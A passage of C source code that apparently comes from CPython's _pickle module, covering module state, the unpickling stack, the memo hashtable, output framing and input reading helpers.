FRAME_SIZE_MIN = 4,
FRAME_SIZE_TARGET = 64 * 1024,
FRAME_HEADER_SIZE = 9
};
/*************************************************************************/
/* State of the pickle module, per PEP 3121. */
typedef struct {
/* Exception classes for pickle. */
PyObject *PickleError;
PyObject *PicklingError;
PyObject *UnpicklingError;
/* copyreg.dispatch_table, {type_object: pickling_function} */
PyObject *dispatch_table;
/* For the extension opcodes EXT1, EXT2 and EXT4. */
/* copyreg._extension_registry, {(module_name, function_name): code} */
PyObject *extension_registry;
/* copyreg._extension_cache, {code: object} */
PyObject *extension_cache;
/* copyreg._inverted_registry, {code: (module_name, function_name)} */
PyObject *inverted_registry;
/* Import mappings for compatibility with Python 2.x */
/* _compat_pickle.NAME_MAPPING,
{(oldmodule, oldname): (newmodule, newname)} */
PyObject *name_mapping_2to3;
/* _compat_pickle.IMPORT_MAPPING, {oldmodule: newmodule} */
PyObject *import_mapping_2to3;
/* Same, but with REVERSE_NAME_MAPPING / REVERSE_IMPORT_MAPPING */
PyObject *name_mapping_3to2;
PyObject *import_mapping_3to2;
/* codecs.encode, used for saving bytes in older protocols */
PyObject *codecs_encode;
/* builtins.getattr, used for saving nested names with protocol < 4 */
PyObject *getattr;
/* functools.partial, used for implementing __newobj_ex__ with protocols
2 and 3 */
PyObject *partial;
} PickleState;
/* Forward declaration of the _pickle module definition. */
static struct PyModuleDef _picklemodule;
/* Given a module object, get its per-module state. */
static PickleState *
_Pickle_GetState(PyObject *module)
{
return (PickleState *)PyModule_GetState(module);
}
/* Find the module instance imported in the currently running sub-interpreter
and get its state. */
static PickleState *
_Pickle_GetGlobalState(void)
{
return _Pickle_GetState(PyState_FindModule(&_picklemodule));
}
/* Clear the given pickle module state. */
static void
_Pickle_ClearState(PickleState *st)
{
Py_CLEAR(st->PickleError);
Py_CLEAR(st->PicklingError);
Py_CLEAR(st->UnpicklingError);
Py_CLEAR(st->dispatch_table);
Py_CLEAR(st->extension_registry);
Py_CLEAR(st->extension_cache);
Py_CLEAR(st->inverted_registry);
Py_CLEAR(st->name_mapping_2to3);
Py_CLEAR(st->import_mapping_2to3);
Py_CLEAR(st->name_mapping_3to2);
Py_CLEAR(st->import_mapping_3to2);
Py_CLEAR(st->codecs_encode);
Py_CLEAR(st->getattr);
Py_CLEAR(st->partial);
}
/* Initialize the given pickle module state. */
static int
_Pickle_InitState(PickleState *st)
{
PyObject *builtins;
PyObject *copyreg = NULL;
PyObject *compat_pickle = NULL;
PyObject *codecs = NULL;
PyObject *functools = NULL;
builtins = PyEval_GetBuiltins();
if (builtins == NULL)
goto error;
st->getattr = PyDict_GetItemString(builtins, "getattr");
if (st->getattr == NULL)
goto error;
Py_INCREF(st->getattr);
copyreg = PyImport_ImportModule("copyreg");
if (!copyreg)
goto error;
st->dispatch_table = PyObject_GetAttrString(copyreg, "dispatch_table");
if (!st->dispatch_table)
goto error;
if (!PyDict_CheckExact(st->dispatch_table)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg.dispatch_table should be a dict, not %.200s",
Py_TYPE(st->dispatch_table)->tp_name);
goto error;
}
st->extension_registry = \
PyObject_GetAttrString(copyreg, "_extension_registry");
if (!st->extension_registry)
goto error;
if (!PyDict_CheckExact(st->extension_registry)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._extension_registry should be a dict, "
"not %.200s", Py_TYPE(st->extension_registry)->tp_name);
goto error;
}
st->inverted_registry = \
PyObject_GetAttrString(copyreg, "_inverted_registry");
if (!st->inverted_registry)
goto error;
if (!PyDict_CheckExact(st->inverted_registry)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._inverted_registry should be a dict, "
"not %.200s", Py_TYPE(st->inverted_registry)->tp_name);
goto error;
}
st->extension_cache = PyObject_GetAttrString(copyreg, "_extension_cache");
if (!st->extension_cache)
goto error;
if (!PyDict_CheckExact(st->extension_cache)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._extension_cache should be a dict, "
"not %.200s", Py_TYPE(st->extension_cache)->tp_name);
goto error;
}
Py_CLEAR(copyreg);
/* Load the 2.x -> 3.x stdlib module mapping tables */
compat_pickle = PyImport_ImportModule("_compat_pickle");
if (!compat_pickle)
goto error;
st->name_mapping_2to3 = \
PyObject_GetAttrString(compat_pickle, "NAME_MAPPING");
if (!st->name_mapping_2to3)
goto error;
if (!PyDict_CheckExact(st->name_mapping_2to3)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING should be a dict, not %.200s",
Py_TYPE(st->name_mapping_2to3)->tp_name);
goto error;
}
st->import_mapping_2to3 = \
PyObject_GetAttrString(compat_pickle, "IMPORT_MAPPING");
if (!st->import_mapping_2to3)
goto error;
if (!PyDict_CheckExact(st->import_mapping_2to3)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.IMPORT_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->import_mapping_2to3)->tp_name);
goto error;
}
/* ... and the 3.x -> 2.x mapping tables */
st->name_mapping_3to2 = \
PyObject_GetAttrString(compat_pickle, "REVERSE_NAME_MAPPING");
if (!st->name_mapping_3to2)
goto error;
if (!PyDict_CheckExact(st->name_mapping_3to2)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->name_mapping_3to2)->tp_name);
goto error;
}
st->import_mapping_3to2 = \
PyObject_GetAttrString(compat_pickle, "REVERSE_IMPORT_MAPPING");
if (!st->import_mapping_3to2)
goto error;
if (!PyDict_CheckExact(st->import_mapping_3to2)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_IMPORT_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->import_mapping_3to2)->tp_name);
goto error;
}
Py_CLEAR(compat_pickle);
codecs = PyImport_ImportModule("codecs");
if (codecs == NULL)
goto error;
st->codecs_encode = PyObject_GetAttrString(codecs, "encode");
if (st->codecs_encode == NULL) {
goto error;
}
if (!PyCallable_Check(st->codecs_encode)) {
PyErr_Format(PyExc_RuntimeError,
"codecs.encode should be a callable, not %.200s",
Py_TYPE(st->codecs_encode)->tp_name);
goto error;
}
Py_CLEAR(codecs);
functools = PyImport_ImportModule("functools");
if (!functools)
goto error;
st->partial = PyObject_GetAttrString(functools, "partial");
if (!st->partial)
goto error;
Py_CLEAR(functools);
return 0;
error:
Py_CLEAR(copyreg);
Py_CLEAR(compat_pickle);
Py_CLEAR(codecs);
Py_CLEAR(functools);
_Pickle_ClearState(st);
return -1;
}
/* Helper for calling a function with a single argument quickly.
This function steals the reference of the given argument. */
static PyObject *
_Pickle_FastCall(PyObject *func, PyObject *obj)
{
PyObject *result;
result = PyObject_CallFunctionObjArgs(func, obj, NULL);
Py_DECREF(obj);
return result;
}
/*************************************************************************/
/* Retrieve and deconstruct a method for avoiding a reference cycle
(pickler -> bound method of pickler -> pickler) */
static int
init_method_ref(PyObject *self, _Py_Identifier *name,
PyObject **method_func, PyObject **method_self)
{
PyObject *func, *func2;
int ret;
/* *method_func and *method_self should be consistent. All refcount decrements
should be occurred after setting *method_self and *method_func. */
ret = _PyObject_LookupAttrId(self, name, &func);
if (func == NULL) {
*method_self = NULL;
Py_CLEAR(*method_func);
return ret;
}
if (PyMethod_Check(func) && PyMethod_GET_SELF(func) == self) {
/* Deconstruct a bound Python method */
func2 = PyMethod_GET_FUNCTION(func);
Py_INCREF(func2);
*method_self = self; /* borrowed */
Py_XSETREF(*method_func, func2);
Py_DECREF(func);
return 0;
}
else {
*method_self = NULL;
Py_XSETREF(*method_func, func);
return 0;
}
}
/* Bind a method if it was deconstructed */
static PyObject *
reconstruct_method(PyObject *func, PyObject *self)
{
if (self) {
return PyMethod_New(func, self);
}
else {
Py_INCREF(func);
return func;
}
}
static PyObject *
call_method(PyObject *func, PyObject *self, PyObject *obj)
{
if (self) {
return PyObject_CallFunctionObjArgs(func, self, obj, NULL);
}
else {
return PyObject_CallFunctionObjArgs(func, obj, NULL);
}
}
/*************************************************************************/
/* Internal data type used as the unpickling stack. */
typedef struct {
PyObject_VAR_HEAD
PyObject **data;
int mark_set; /* is MARK set? */
Py_ssize_t fence; /* position of top MARK or 0 */
Py_ssize_t allocated; /* number of slots in data allocated */
} Pdata;
static void
Pdata_dealloc(Pdata *self)
{
Py_ssize_t i = Py_SIZE(self);
while (--i >= 0) {
Py_DECREF(self->data[i]);
}
PyMem_FREE(self->data);
PyObject_Del(self);
}
static PyTypeObject Pdata_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Pdata", /*tp_name*/
sizeof(Pdata), /*tp_basicsize*/
sizeof(PyObject *), /*tp_itemsize*/
(destructor)Pdata_dealloc, /*tp_dealloc*/
};
static PyObject *
Pdata_New(void)
{
Pdata *self;
if (!(self = PyObject_New(Pdata, &Pdata_Type)))
return NULL;
Py_SIZE(self) = 0;
self->mark_set = 0;
self->fence = 0;
self->allocated = 8;
self->data = PyMem_MALLOC(self->allocated * sizeof(PyObject *));
if (self->data)
return (PyObject *)self;
Py_DECREF(self);
return PyErr_NoMemory();
}
/* Retain only the initial clearto items. If clearto >= the current
* number of items, this is a (non-erroneous) NOP.
*/
static int
Pdata_clear(Pdata *self, Py_ssize_t clearto)
{
Py_ssize_t i = Py_SIZE(self);
assert(clearto >= self->fence);
if (clearto >= i)
return 0;
while (--i >= clearto) {
Py_CLEAR(self->data[i]);
}
Py_SIZE(self) = clearto;
return 0;
}
static int
Pdata_grow(Pdata *self)
{
PyObject **data = self->data;
size_t allocated = (size_t)self->allocated;
size_t new_allocated;
new_allocated = (allocated >> 3) + 6;
/* check for integer overflow */
if (new_allocated > (size_t)PY_SSIZE_T_MAX - allocated)
goto nomemory;
new_allocated += allocated;
PyMem_RESIZE(data, PyObject *, new_allocated);
if (data == NULL)
goto nomemory;
self->data = data;
self->allocated = (Py_ssize_t)new_allocated;
return 0;
nomemory:
PyErr_NoMemory();
return -1;
}
static int
Pdata_stack_underflow(Pdata *self)
{
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
self->mark_set ?
"unexpected MARK found" :
"unpickling stack underflow");
return -1;
}
/* D is a Pdata*. Pop the topmost element and store it into V, which
* must be an lvalue holding PyObject*. On stack underflow, UnpicklingError
* is raised and V is set to NULL.
*/
static PyObject *
Pdata_pop(Pdata *self)
{
if (Py_SIZE(self) <= self->fence) {
Pdata_stack_underflow(self);
return NULL;
}
return self->data[--Py_SIZE(self)];
}
#define PDATA_POP(D, V) do { (V) = Pdata_pop((D)); } while (0)
static int
Pdata_push(Pdata *self, PyObject *obj)
{
if (Py_SIZE(self) == self->allocated && Pdata_grow(self) < 0) {
return -1;
}
self->data[Py_SIZE(self)++] = obj;
return 0;
}
/* Push an object on stack, transferring its ownership to the stack. */
#define PDATA_PUSH(D, O, ER) do { \
if (Pdata_push((D), (O)) < 0) return (ER); } while(0)
/* Push an object on stack, adding a new reference to the object. */
#define PDATA_APPEND(D, O, ER) do { \
Py_INCREF((O)); \
if (Pdata_push((D), (O)) < 0) return (ER); } while(0)
static PyObject *
Pdata_poptuple(Pdata *self, Py_ssize_t start)
{
PyObject *tuple;
Py_ssize_t len, i, j;
if (start < self->fence) {
Pdata_stack_underflow(self);
return NULL;
}
len = Py_SIZE(self) - start;
tuple = PyTuple_New(len);
if (tuple == NULL)
return NULL;
for (i = start, j = 0; j < len; i++, j++)
PyTuple_SET_ITEM(tuple, j, self->data[i]);
Py_SIZE(self) = start;
return tuple;
}
static PyObject *
Pdata_poplist(Pdata *self, Py_ssize_t start)
{
PyObject *list;
Py_ssize_t len, i, j;
len = Py_SIZE(self) - start;
list = PyList_New(len);
if (list == NULL)
return NULL;
for (i = start, j = 0; j < len; i++, j++)
PyList_SET_ITEM(list, j, self->data[i]);
Py_SIZE(self) = start;
return list;
}
typedef struct {
PyObject *me_key;
Py_ssize_t me_value;
} PyMemoEntry;
typedef struct {
size_t mt_mask;
size_t mt_used;
size_t mt_allocated;
PyMemoEntry *mt_table;
} PyMemoTable;
typedef struct PicklerObject {
PyObject_HEAD
PyMemoTable *memo; /* Memo table, keep track of the seen
objects to support self-referential objects
pickling. */
PyObject *pers_func; /* persistent_id() method, can be NULL */
PyObject *pers_func_self; /* borrowed reference to self if pers_func
is an unbound method, NULL otherwise */
PyObject *dispatch_table; /* private dispatch_table, can be NULL */
PyObject *write; /* write() method of the output stream. */
PyObject *output_buffer; /* Write into a local bytearray buffer before
flushing to the stream. */
Py_ssize_t output_len; /* Length of output_buffer. */
Py_ssize_t max_output_len; /* Allocation size of output_buffer. */
int proto; /* Pickle protocol number, >= 0 */
int bin; /* Boolean, true if proto > 0 */
int framing; /* True when framing is enabled, proto >= 4 */
Py_ssize_t frame_start; /* Position in output_buffer where the
current frame begins. -1 if there
is no frame currently open. */
Py_ssize_t buf_size; /* Size of the current buffered pickle data */
int fast; /* Enable fast mode if set to a true value.
The fast mode disable the usage of memo,
therefore speeding the pickling process by
not generating superfluous PUT opcodes. It
should not be used if with self-referential
objects. */
int fast_nesting;
int fix_imports; /* Indicate whether Pickler should fix
the name of globals for Python 2.x. */
PyObject *fast_memo;
} PicklerObject;
typedef struct UnpicklerObject {
PyObject_HEAD
Pdata *stack; /* Pickle data stack, store unpickled objects. */
/* The unpickler memo is just an array of PyObject *s. Using a dict
is unnecessary, since the keys are contiguous ints. */
PyObject **memo;
size_t memo_size; /* Capacity of the memo array */
size_t memo_len; /* Number of objects in the memo */
PyObject *pers_func; /* persistent_load() method, can be NULL. */
PyObject *pers_func_self; /* borrowed reference to self if pers_func
is an unbound method, NULL otherwise */
Py_buffer buffer;
char *input_buffer;
char *input_line;
Py_ssize_t input_len;
Py_ssize_t next_read_idx;
Py_ssize_t prefetched_idx; /* index of first prefetched byte */
PyObject *read; /* read() method of the input stream. */
PyObject *readline; /* readline() method of the input stream. */
PyObject *peek; /* peek() method of the input stream, or NULL */
char *encoding; /* Name of the encoding to be used for
decoding strings pickled using Python
2.x. The default value is "ASCII" */
char *errors; /* Name of errors handling scheme to used when
decoding strings. The default value is
"strict". */
Py_ssize_t *marks; /* Mark stack, used for unpickling container
objects. */
Py_ssize_t num_marks; /* Number of marks in the mark stack. */
Py_ssize_t marks_size; /* Current allocated size of the mark stack. */
int proto; /* Protocol of the pickle loaded. */
int fix_imports; /* Indicate whether Unpickler should fix
the name of globals pickled by Python 2.x. */
} UnpicklerObject;
typedef struct {
PyObject_HEAD
PicklerObject *pickler; /* Pickler whose memo table we're proxying. */
} PicklerMemoProxyObject;
typedef struct {
PyObject_HEAD
UnpicklerObject *unpickler;
} UnpicklerMemoProxyObject;
/* Forward declarations */
static int save(PicklerObject *, PyObject *, int);
static int save_reduce(PicklerObject *, PyObject *, PyObject *);
static PyTypeObject Pickler_Type;
static PyTypeObject Unpickler_Type;
#include "clinic/_pickle.c.h"
/*************************************************************************
A custom hashtable mapping void* to Python ints. This is used by the pickler
for memoization. Using a custom hashtable rather than PyDict allows us to skip
a bunch of unnecessary object creation. This makes a huge performance
difference. */
#define MT_MINSIZE 8
#define PERTURB_SHIFT 5
static PyMemoTable *
PyMemoTable_New(void)
{
PyMemoTable *memo = PyMem_MALLOC(sizeof(PyMemoTable));
if (memo == NULL) {
PyErr_NoMemory();
return NULL;
}
memo->mt_used = 0;
memo->mt_allocated = MT_MINSIZE;
memo->mt_mask = MT_MINSIZE - 1;
memo->mt_table = PyMem_MALLOC(MT_MINSIZE * sizeof(PyMemoEntry));
if (memo->mt_table == NULL) {
PyMem_FREE(memo);
PyErr_NoMemory();
return NULL;
}
memset(memo->mt_table, 0, MT_MINSIZE * sizeof(PyMemoEntry));
return memo;
}
static PyMemoTable *
PyMemoTable_Copy(PyMemoTable *self)
{
PyMemoTable *new = PyMemoTable_New();
if (new == NULL)
return NULL;
new->mt_used = self->mt_used;
new->mt_allocated = self->mt_allocated;
new->mt_mask = self->mt_mask;
/* The table we get from _New() is probably smaller than we wanted.
Free it and allocate one that's the right size. */
PyMem_FREE(new->mt_table);
new->mt_table = PyMem_NEW(PyMemoEntry, self->mt_allocated);
if (new->mt_table == NULL) {
PyMem_FREE(new);
PyErr_NoMemory();
return NULL;
}
for (size_t i = 0; i < self->mt_allocated; i++) {
Py_XINCREF(self->mt_table[i].me_key);
}
memcpy(new->mt_table, self->mt_table,
sizeof(PyMemoEntry) * self->mt_allocated);
return new;
}
static Py_ssize_t
PyMemoTable_Size(PyMemoTable *self)
{
return self->mt_used;
}
static int
PyMemoTable_Clear(PyMemoTable *self)
{
Py_ssize_t i = self->mt_allocated;
while (--i >= 0) {
Py_XDECREF(self->mt_table[i].me_key);
}
self->mt_used = 0;
memset(self->mt_table, 0, self->mt_allocated * sizeof(PyMemoEntry));
return 0;
}
static void
PyMemoTable_Del(PyMemoTable *self)
{
if (self == NULL)
return;
PyMemoTable_Clear(self);
PyMem_FREE(self->mt_table);
PyMem_FREE(self);
}
/* Since entries cannot be deleted from this hashtable, _PyMemoTable_Lookup()
can be considerably simpler than dictobject.c's lookdict(). */
static PyMemoEntry *
_PyMemoTable_Lookup(PyMemoTable *self, PyObject *key)
{
size_t i;
size_t perturb;
size_t mask = self->mt_mask;
PyMemoEntry *table = self->mt_table;
PyMemoEntry *entry;
Py_hash_t hash = (Py_hash_t)key >> 3;
i = hash & mask;
entry = &table[i];
if (entry->me_key == NULL || entry->me_key == key)
return entry;
for (perturb = hash; ; perturb >>= PERTURB_SHIFT) {
i = (i << 2) + i + perturb + 1;
entry = &table[i & mask];
if (entry->me_key == NULL || entry->me_key == key)
return entry;
}
Py_UNREACHABLE();
}
/* Returns -1 on failure, 0 on success. */
static int
_PyMemoTable_ResizeTable(PyMemoTable *self, size_t min_size)
{
PyMemoEntry *oldtable = NULL;
PyMemoEntry *oldentry, *newentry;
size_t new_size = MT_MINSIZE;
size_t to_process;
assert(min_size > 0);
if (min_size > PY_SSIZE_T_MAX) {
PyErr_NoMemory();
return -1;
}
/* Find the smallest valid table size >= min_size. */
while (new_size < min_size) {
new_size <<= 1;
}
/* new_size needs to be a power of two. */
assert((new_size & (new_size - 1)) == 0);
/* Allocate new table. */
oldtable = self->mt_table;
self->mt_table = PyMem_NEW(PyMemoEntry, new_size);
if (self->mt_table == NULL) {
self->mt_table = oldtable;
PyErr_NoMemory();
return -1;
}
self->mt_allocated = new_size;
self->mt_mask = new_size - 1;
memset(self->mt_table, 0, sizeof(PyMemoEntry) * new_size);
/* Copy entries from the old table. */
to_process = self->mt_used;
for (oldentry = oldtable; to_process > 0; oldentry++) {
if (oldentry->me_key != NULL) {
to_process--;
/* newentry is a pointer to a chunk of the new
mt_table, so we're setting the key:value pair
in-place. */
newentry = _PyMemoTable_Lookup(self, oldentry->me_key);
newentry->me_key = oldentry->me_key;
newentry->me_value = oldentry->me_value;
}
}
/* Deallocate the old table. */
PyMem_FREE(oldtable);
return 0;
}
/* Returns NULL on failure, a pointer to the value otherwise. */
static Py_ssize_t *
PyMemoTable_Get(PyMemoTable *self, PyObject *key)
{
PyMemoEntry *entry = _PyMemoTable_Lookup(self, key);
if (entry->me_key == NULL)
return NULL;
return &entry->me_value;
}
/* Returns -1 on failure, 0 on success. */
static int
PyMemoTable_Set(PyMemoTable *self, PyObject *key, Py_ssize_t value)
{
PyMemoEntry *entry;
assert(key != NULL);
entry = _PyMemoTable_Lookup(self, key);
if (entry->me_key != NULL) {
entry->me_value = value;
return 0;
}
Py_INCREF(key);
entry->me_key = key;
entry->me_value = value;
self->mt_used++;
/* If we added a key, we can safely resize. Otherwise just return!
* If used >= 2/3 size, adjust size. Normally, this quaduples the size.
*
* Quadrupling the size improves average table sparseness
* (reducing collisions) at the cost of some memory. It also halves
* the number of expensive resize operations in a growing memo table.
*
* Very large memo tables (over 50K items) use doubling instead.
* This may help applications with severe memory constraints.
*/
if (SIZE_MAX / 3 >= self->mt_used && self->mt_used * 3 < self->mt_allocated * 2) {
return 0;
}
// self->mt_used is always < PY_SSIZE_T_MAX, so this can't overflow.
size_t desired_size = (self->mt_used > 50000 ? 2 : 4) * self->mt_used;
return _PyMemoTable_ResizeTable(self, desired_size);
}
#undef MT_MINSIZE
#undef PERTURB_SHIFT
/*************************************************************************/
static int
_Pickler_ClearBuffer(PicklerObject *self)
{
Py_XSETREF(self->output_buffer,
PyBytes_FromStringAndSize(NULL, self->max_output_len));
if (self->output_buffer == NULL)
return -1;
self->output_len = 0;
self->frame_start = -1;
return 0;
}
static void
_write_size64(char *out, size_t value)
{
size_t i;
Py_BUILD_ASSERT(sizeof(size_t) <= 8);
for (i = 0; i < sizeof(size_t); i++) {
out[i] = (unsigned char)((value >> (8 * i)) & 0xff);
}
for (i = sizeof(size_t); i < 8; i++) {
out[i] = 0;
}
}
static int
_Pickler_CommitFrame(PicklerObject *self)
{
size_t frame_len;
char *qdata;
if (!self->framing || self->frame_start == -1)
return 0;
frame_len = self->output_len - self->frame_start - FRAME_HEADER_SIZE;
qdata = PyBytes_AS_STRING(self->output_buffer) + self->frame_start;
if (frame_len >= FRAME_SIZE_MIN) {
qdata[0] = FRAME;
_write_size64(qdata + 1, frame_len);
}
else {
memmove(qdata, qdata + FRAME_HEADER_SIZE, frame_len);
self->output_len -= FRAME_HEADER_SIZE;
}
self->frame_start = -1;
return 0;
}
static PyObject *
_Pickler_GetString(PicklerObject *self)
{
PyObject *output_buffer = self->output_buffer;
assert(self->output_buffer != NULL);
if (_Pickler_CommitFrame(self))
return NULL;
self->output_buffer = NULL;
/* Resize down to exact size */
if (_PyBytes_Resize(&output_buffer, self->output_len) < 0)
return NULL;
return output_buffer;
}
static int
_Pickler_FlushToFile(PicklerObject *self)
{
PyObject *output, *result;
assert(self->write != NULL);
/* This will commit the frame first */
output = _Pickler_GetString(self);
if (output == NULL)
return -1;
result = _Pickle_FastCall(self->write, output);
Py_XDECREF(result);
return (result == NULL) ? -1 : 0;
}
static int
_Pickler_OpcodeBoundary(PicklerObject *self)
{
Py_ssize_t frame_len;
if (!self->framing || self->frame_start == -1) {
return 0;
}
frame_len = self->output_len - self->frame_start - FRAME_HEADER_SIZE;
if (frame_len >= FRAME_SIZE_TARGET) {
if(_Pickler_CommitFrame(self)) {
return -1;
}
/* Flush the content of the committed frame to the underlying
* file and reuse the pickler buffer for the next frame so as
* to limit memory usage when dumping large complex objects to
* a file.
*
* self->write is NULL when called via dumps.
*/
if (self->write != NULL) {
if (_Pickler_FlushToFile(self) < 0) {
return -1;
}
if (_Pickler_ClearBuffer(self) < 0) {
return -1;
}
}
}
return 0;
}
static Py_ssize_t
_Pickler_Write(PicklerObject *self, const char *s, Py_ssize_t data_len)
{
Py_ssize_t i, n, required;
char *buffer;
int need_new_frame;
assert(s != NULL);
need_new_frame = (self->framing && self->frame_start == -1);
if (need_new_frame)
n = data_len + FRAME_HEADER_SIZE;
else
n = data_len;
required = self->output_len + n;
if (required > self->max_output_len) {
/* Make place in buffer for the pickle chunk */
if (self->output_len >= PY_SSIZE_T_MAX / 2 - n) {
PyErr_NoMemory();
return -1;
}
self->max_output_len = (self->output_len + n) / 2 * 3;
if (_PyBytes_Resize(&self->output_buffer, self->max_output_len) < 0)
return -1;
}
buffer = PyBytes_AS_STRING(self->output_buffer);
if (need_new_frame) {
/* Setup new frame */
Py_ssize_t frame_start = self->output_len;
self->frame_start = frame_start;
for (i = 0; i < FRAME_HEADER_SIZE; i++) {
/* Write an invalid value, for debugging */
buffer[frame_start + i] = 0xFE;
}
self->output_len += FRAME_HEADER_SIZE;
}
if (data_len < 8) {
/* This is faster than memcpy when the string is short. */
for (i = 0; i < data_len; i++) {
buffer[self->output_len + i] = s[i];
}
}
else {
memcpy(buffer + self->output_len, s, data_len);
}
self->output_len += data_len;
return data_len;
}
static PicklerObject *
_Pickler_New(void)
{
PicklerObject *self;
self = PyObject_GC_New(PicklerObject, &Pickler_Type);
if (self == NULL)
return NULL;
self->pers_func = NULL;
self->dispatch_table = NULL;
self->write = NULL;
self->proto = 0;
self->bin = 0;
self->framing = 0;
self->frame_start = -1;
self->fast = 0;
self->fast_nesting = 0;
self->fix_imports = 0;
self->fast_memo = NULL;
self->max_output_len = WRITE_BUF_SIZE;
self->output_len = 0;
self->memo = PyMemoTable_New();
self->output_buffer = PyBytes_FromStringAndSize(NULL,
self->max_output_len);
if (self->memo == NULL || self->output_buffer == NULL) {
Py_DECREF(self);
return NULL;
}
return self;
}
static int
_Pickler_SetProtocol(PicklerObject *self, PyObject *protocol, int fix_imports)
{
long proto;
if (protocol == NULL || protocol == Py_None) {
proto = DEFAULT_PROTOCOL;
}
else {
proto = PyLong_AsLong(protocol);
if (proto < 0) {
if (proto == -1 && PyErr_Occurred())
return -1;
proto = HIGHEST_PROTOCOL;
}
else if (proto > HIGHEST_PROTOCOL) {
PyErr_Format(PyExc_ValueError, "pickle protocol must be <= %d",
HIGHEST_PROTOCOL);
return -1;
}
}
self->proto = (int)proto;
self->bin = proto > 0;
self->fix_imports = fix_imports && proto < 3;
return 0;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Pickler_SetOutputStream(PicklerObject *self, PyObject *file)
{
_Py_IDENTIFIER(write);
assert(file != NULL);
if (_PyObject_LookupAttrId(file, &PyId_write, &self->write) < 0) {
return -1;
}
if (self->write == NULL) {
PyErr_SetString(PyExc_TypeError,
"file must have a 'write' attribute");
return -1;
}
return 0;
}
/* Returns the size of the input on success, -1 on failure. This takes its
own reference to `input`. */
static Py_ssize_t
_Unpickler_SetStringInput(UnpicklerObject *self, PyObject *input)
{
if (self->buffer.buf != NULL)
PyBuffer_Release(&self->buffer);
if (PyObject_GetBuffer(input, &self->buffer, PyBUF_CONTIG_RO) < 0)
return -1;
self->input_buffer = self->buffer.buf;
self->input_len = self->buffer.len;
self->next_read_idx = 0;
self->prefetched_idx = self->input_len;
return self->input_len;
}
static int
bad_readline(void)
{
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "pickle data was truncated");
return -1;
}
static int
_Unpickler_SkipConsumed(UnpicklerObject *self)
{
Py_ssize_t consumed;
PyObject *r;
consumed = self->next_read_idx - self->prefetched_idx;
if (consumed <= 0)
return 0;
assert(self->peek); /* otherwise we did something wrong */
/* This makes a useless copy... */
r = PyObject_CallFunction(self->read, "n", consumed);
if (r == NULL)
return -1;
Py_DECREF(r);
self->prefetched_idx = self->next_read_idx;
return 0;
}
static const Py_ssize_t READ_WHOLE_LINE = -1;
/* If reading from a file, we need to only pull the bytes we need, since there
may be multiple pickle objects arranged contiguously in the same input
buffer.
If `n` is READ_WHOLE_LINE, read a whole line. Otherwise, read up to `n`
bytes from the input stream/buffer.
Update the unpickler's input buffer with the newly-read data. Returns -1 on
failure; on success, returns the number of bytes read from the file.
On success, self->input_len will be 0; this is intentional so that when
unpickling from a file, the "we've run out of data" code paths will trigger,
causing the Unpickler to go back to the file for more data. Use the returned
size to tell you how much data you can process. */
static Py_ssize_t
_Unpickler_ReadFromFile(UnpicklerObject *self, Py_ssize_t n)
{
PyObject *data;
Py_ssize_t read_size;
assert(self->read != NULL);
if (_Unpickler_SkipConsumed(self) < 0)
return -1;
if (n == READ_WHOLE_LINE) {
data = _PyObject_CallNoArg(self->readline);
}
else {
PyObject *len;
/* Prefetch some data without advancing the file pointer, if possible */
if (self->peek && n < PREFETCH) {
len = PyLong_FromSsize_t(PREFETCH);
if (len == NULL)
return -1;
data = _Pickle_FastCall(self->peek, len);
if (data == NULL) {
if (!PyErr_ExceptionMatches(PyExc_NotImplementedError))
return -1;
/* peek() is probably not supported by the given file object */
PyErr_Clear();
Py_CLEAR(self->peek);
}
else {
read_size = _Unpickler_SetStringInput(self, data);
Py_DECREF(data);
self->prefetched_idx = 0;
if (n <= read_size)
return n;
}
}
len = PyLong_FromSsize_t(n);
if (len == NULL)
return -1;
data = _Pickle_FastCall(self->read, len);
}
if (data == NULL)
return -1;
read_size = _Unpickler_SetStringInput(self, data);
Py_DECREF(data);
return read_size;
}
/* Don't call it directly: use _Unpickler_Read() */
static Py_ssize_t
_Unpickler_ReadImpl(UnpicklerObject *self, char **s, Py_ssize_t n)
{
Py_ssize_t num_read;
*s = NULL;
if (self->next_read_idx > PY_SSIZE_T_MAX - n) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"read would overflow (invalid bytecode)");
return -1;
}
/* This case is handled by the _Unpickler_Read() macro for efficiency */
assert(self->next_read_idx + n > self->input_len);
if (!self->read)
return bad_readline();
num_read = _Unpickler_ReadFromFile(self, n);
if (num_read < 0)
return -1;
if (num_read < n)
return bad_readline();
*s = self->input_buffer;
self->next_read_idx = n;
return n;
}
/* Read `n` bytes from the unpickler's data source, storing the result in `*s`.
This should be used for all data reads, rather than accessing the unpickler's
input buffer directly. This method deals correctly with reading from input
streams, which the input buffer doesn't deal with.
Note that when reading from a file-like object, self->next_read_idx won't
be updated (it should remain at 0 for the entire unpickling process). You
should use this function's return value to know how many bytes you can
consume.
Returns -1 (with an exception set) on failure. On success, return the
number of chars read. */
#define _Unpickler_Read(self, s, n) \
(((n) <= (self)->input_len - (self)->next_read_idx) \
? (*(s) = (self)->input_buffer + (self)->next_read_idx, \
(self)->next_read_idx += (n), \
(n)) \
: _Unpickler_ReadImpl(self, (s), (n)))
static Py_ssize_t
_Unpickler_CopyLine(UnpicklerObject *self, char *line, Py_ssize_t len,
char **result)
{
char *input_line = PyMem_Realloc(self->input_line, len + 1);
if (input_line == NULL) {
PyErr_NoMemory();
return -1;
}
memcpy(input_line, line, len);
input_line[len] = '\0';
self->input_line = input_line;
*result = self->input_line;
return len;
}
/* Read a line from the input stream/buffer. If we run off the end of the input
before hitting \n, raise an error.
